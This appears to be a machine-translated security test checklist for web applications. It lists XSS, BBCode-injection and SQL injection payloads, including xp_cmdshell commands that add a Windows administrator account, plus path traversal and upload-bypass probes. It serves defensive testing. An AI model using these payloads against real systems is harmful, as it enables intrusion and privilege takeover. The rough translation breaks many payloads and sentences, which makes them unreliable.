Common Security Test Cases

Establish an overall threat model to test overflow vulnerabilities, information leakage, error handling,SQLInjection, authentication, and authorization errors.

1Input verification

Client-side verification on the server (disable script debugging and disable Cookies)

1. Enter a large number (such as 4,294,967,269) and a small number (negative number)

2. if the length of the input text is limited, try to exceed the limit. What is the reaction when the limit is reached?

3. Enter special characters, such :~! @ # $ % ^ & * () _ + <>: "{} |

4. Enter Chinese and English spaces. The input string contains spaces. Enter spaces at the beginning and end.

5. Enter the special string NULL, null, 0x0d 0x 0a

6. Enter a normal string

7. enter and require different types of characters. For example, if a number is required, the system checks positive values, negative values, zero values (positive and negative), decimal places, letters, and null values; if a letter is required, check that the number is entered.

8. Enter html and javascript code

9. For a test point such as the number of answers that need to check the correctness of the numbers, not only the number of answers to the question's final page, but also the number of answers that need to be added or deleted to view the changes

For example:

1. Enter

2. Enter <input type = "text" name = "user"/> to check whether a text box exists;

3. Enter <script type = "text/javascript"> alert ("prompt") </script> to check whether a prompt is displayed.

About upload:

1. Are there any format restrictions for uploading files and whether exe files can be uploaded;

2. Check whether the size of the uploaded file is limited, whether the upload of a large file causes an exception or error, whether the upload of a 0 K file causes an exception or not, and whether the upload of a non-existing file causes an exception or not;

3. Can the format restriction be bypassed by modifying the extension, and can the format restriction be bypassed by pressing the package;

4. Is there a limit on the size of the upload space that exceeds the size limit? For example, if you split and upload a large file that exceeds the size limit, Will an exception occur.

5. If the size of the uploaded file is greater than the size of the remaining local space, whether an exception occurs.

6. Determine whether the upload is successful. The upload is interrupted. Determines whether the upload is successful.

7. upload files with Chinese characters and special characters in the file name.

Download:

1. Avoid entering \... \ web.
2. Modify the name suffix.

AboutURL:

1. Can some pages be accessed only after logon or by special users by directly entering the website address;

2. if a URL with parameters is maliciously modified (if it is a number, a letter, a large number, or a special character is entered), whether the URL is opened incorrectly, illegal access to some pages;

3. If a url such as a search page contains keywords, enter html code or JavaScript to check whether the url is displayed or executed on the page.

4. Enter a goodwill character.

UBB:

 

[Url = http: // www. *****. com] Your website [/url]

1. Try entering UBB code in various ways, such as incomplete code and code nesting.

2. Add attributes such as styles and events to the UBB code to check whether they work.

3. Enter the UBB code that does not exist in the editor to check whether it works.

[Url = javascript: alert ('hello')] link [/url]

[Email = javascript: alert ('hello')] EMail [/email]

[Email = yangtao@rising.com.cn STYLE = "background-image: url (javascript: alert ('xss')"] yangtao@rising.com.cn [/email]

[Img] http://www.13fun.cn/2007713015578593_03.jpg style = "background-image: url (javascript: alert ('alert (xss) ')" [/img]

[Img] http://www.13fun.cn/photo/2007-7/2007713015578593_03.jpg "onmouseover = alert ('hello');" [/img]

[B STYLE = "background-image: url (javascript: alert ('xsss')"] Slice service network [/B]

[I STYLE = "background-image: url (javascript: alert ('xsss')"] Beijing [/I]

[U] August 5, 1234 Beijing [/u]

[Font = "STYLE =" background-image: url (javascript: alert ('xsss') "], Beijing [/font]

[Size = 4 "STYLE =" background-image: url (javascript: alert ('xss') "] May Beijing [/size]

[Color = Red "STYLE =" background-image: url (javascript: alert ('xsss') "] May Beijing [/color]

[Align = center "STYLE =" background-image: url (javascript: alert ('xsss') "], Beijing [/align]

[Float = left "STYLE =" background-image: url (javascript: alert ('xsss') "] Beijing [/float]

[Font = STYLE = "background-image: url (javascript: alert ('xsss')"], Beijing [/font]

[Size = 4 STYLE = "background-image: url (javascript: alert ('xss')"] May Beijing [/size]

[Color = Red STYLE = "background-image: url (javascript: alert ('xsss')"] Beijing [/color]

[Align = center STYLE = "background-image: url (javascript: alert ('xss')"], Beijing [/align]

[List = 1]

[*] May, Beijing [/list]

[Indent] August 5, 1234 Beijing [/indent]

[Float = left STYLE = "background-image: url (javascript: alert ('xss')"] Beijing [/float]

[Media = ra, 400,300, 0] http://bbsforblog.ikaka.com/posttopic.aspx? Forumid = 109 [/media]

Output Encoding

Common Test input statements include:

<Input type = "text"/>

<Input/>

<Input/

<Script> alert ('hello'); </script>

1. jpg "onmouseover =" alert ('xsss ')

"> </A> <script> alert ('xss'); </script>

Http: // xxx '; alert ('xss'); var/a = 'a

'"> Xss & <

A = "\"; B = "; alert (/xss /);//"

0" Alt = "logo"/>

"'"

'"'

""

""

"

"'"

Title = ""

Compare the output data to see if any problem occurs.

PreventSQLInjection

Admin --

'Or --

'And () exec insert * % chr mid

And 1 = 1; And 1 = 1; aNd 1 = 1; char (97) char (110) char (100) char (49) char (61) char (49 ); % 20AND % 201 = 2

'And 1 = 1;' And 1 = 1; 'aNd 1 = 1;

And 1 = 2; 'and 1 = 2

And 2 = 2

And user> 0

And (select count (*) from sysobjects)> 0

And (select count (*) from msysobjects)> 0

And (Select Count (*) from Admin)> = 0

And (select top 1 len (username) from Admin)> 0 (known field of username)

; Exec master.. xp_cmdshell "net user name password/add "-

; Exec master.. xp_cmdshell "net localgroup name administrators/add "-

And 0 <> (select count (*) from admin)

A simple example is where xtype = 'u'. the ASCII code of the character U is 85, so you can replace it with where xtype = char (85). If the character is Chinese, for example, where name = 'user' can be replaced by where name = nchar (29992) + nchar (25143.

 Cross-site Scripting (XSS)

For XSS, you only need to check the HTML output and see where your input is. Is it in an HREF mark? Is it in the IFRAME flag? Is it in the CLSID mark? In img src? What is the param name of some Flash content?

★~! @ # $ % ^ & * () _ + <> ,./?; '"[] {}\-

★% 3 Cinput/% 3E

★% 3 Cscript % 3 Ealert ('xss') % 3C /Script % 3E

★<Input type = "text"/>

★<Input/>

★<Input/

★<Script> alert ('xss') </script>

★<Script> alert ('xss'); </script>

★</Script> <script> alert ('xss') </script>

★Javascript: alert (/xss /)

★Javascrip & #116 & #58 alert (/xss /)

★

★

★

★= '> <Script> alert (document. cookie) </script>

★1. jpg "onmouseover =" alert ('xsss ')

★"> </A> <script> alert ('xss'); </script>

★Http: // xxx '; alert ('xss'); var/a = 'a

★'"> Xss & <

★"Onmouseover = alert ('hello ');"

★& {Alert ('hello ');}

★> "'> <Script> alert ('xsss') </script>

★> % 22% 27>

★> "'> 6a ; % 26% 23x61; % 26% 23x76; % 26% 23x61; % 26% 23x73; % 26% 23x63; % 26% 23x72; % 26% 23x69; % 26% 23x70; % 26% 23x74; % 26% 23x 3a ; Alert (% 26 quot; XSS % 26 quot;)>

★AK % 22% 20 style % 3D % 22 background: url (javascript: alert (% 27XSS % 27) % 22% 20OS % 22

★% 22% 2 Balert (% 27XSS % 27) % 2B % 22

★<Table background = "javascript: alert ([code])"> </table>

★<Object type = text/html data = "javascript: alert ([code]);"> </object>

★<Body onload = "javascript: alert ([code])"> </body>

★A? <Script> alert ('vulnerable') </script>

★<! -- '"> &:

Var from = '$! Rundata. Parameters. getString ('from ')';

Var from = "; hackerFunction (document. cookie );";

Http://searchbox.mapbar.com/publish/template/template1010? CID = qingke & tid = tid1010 & cityName = Tianjin <script> alert ("hello") </script> & nid = mapbxitbjrqmywjrx1_x

 Cross-Site Request Forgery (CSRF)

If two pages are opened in the same browser and the permissions of one page are invalid, can the other page be operated successfully.

When there is no CHECKCODE on the page, check the page source code to check whether there is a token. If the page is completely displayed, there will be no tokens.